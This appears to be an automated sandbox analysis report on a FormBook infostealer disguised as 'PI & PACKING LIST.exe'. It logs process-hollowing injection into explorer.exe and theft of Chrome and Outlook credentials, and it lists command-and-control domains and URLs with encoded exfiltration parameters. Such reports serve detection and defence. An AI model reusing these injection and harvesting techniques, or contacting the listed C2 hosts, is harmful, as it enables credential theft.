Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756334 Sample: PI & PACKING LIST.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus detection for URL or domain 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 6 other signatures 2->38 8 PI & PACKING LIST.exe 3 2->8         started        process3 file4 24 C:\Users\user\...\PI & PACKING LIST.exe.log, ASCII 8->24 dropped 50 Injects a PE file into a foreign processes 8->50 12 PI & PACKING LIST.exe 8->12         started        15 PI & PACKING LIST.exe 8->15         started        signatures5 process6 signatures7 52 Modifies the context of a thread in another process (thread injection) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Sample uses process hollowing technique 12->56 58 Queues an APC in another process (thread injection) 12->58 17 explorer.exe 12->17 injected process8 dnsIp9 26 www.cpitherapy.com 178.128.239.245, 49700, 49701, 49702 DIGITALOCEAN-ASNUS Netherlands 17->26 28 www.p-soils.com 162.43.120.154, 49703, 49704, 49705 CYBERTRAILSUS United States 17->28 30 5 other IPs or domains 17->30 40 System process connects to network (likely due to code injection or exploit) 17->40 21 control.exe 13 17->21         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 21->42 44 Tries to harvest and steal browser information (history, passwords, etc) 21->44 46 Deletes itself after installation 21->46 48 2 other signatures 21->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.78.89.117
 www.zkjk888.com United States
16509 AMAZON-02US true
162.43.120.154
 www.p-soils.com United States
11333 CYBERTRAILSUS true
142.250.203.115
 ghs.googlehosted.com United States
15169 GOOGLEUS false
178.128.239.245
 www.cpitherapy.com Netherlands
14061 DIGITALOCEAN-ASNUS true
209.99.64.33
 www.nu2uresale.store United States
40034 CONFLUENCE-NETWORK-INCVG true

Contacted Domains

Name IP Active
www.nu2uresale.store 209.99.64.33 true
www.p-soils.com 162.43.120.154 true
www.zkjk888.com 35.78.89.117 true
www.cpitherapy.com 178.128.239.245 true
ghs.googlehosted.com 142.250.203.115 true
www.bengalindex.com unknown unknown
www.gebouwpas.online unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.p-soils.com/m5oe/ true
  • Avira URL Cloud: malware
 unknown
http://www.bengalindex.com/m5oe/ false
  • Avira URL Cloud: malware
 unknown
http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 true
  • Avira URL Cloud: malware
 unknown
http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 true
  • Avira URL Cloud: malware
 unknown
www.singglostudio.com/m5oe/ true
  • Avira URL Cloud: safe
 low
http://www.nu2uresale.store/m5oe/ true
  • Avira URL Cloud: malware
 unknown
http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 true
  • Avira URL Cloud: malware
 unknown
http://www.cpitherapy.com/m5oe/ true
  • Avira URL Cloud: malware
 unknown
http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 true
  • Avira URL Cloud: malware
 unknown
http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 false
  • Avira URL Cloud: malware
 unknown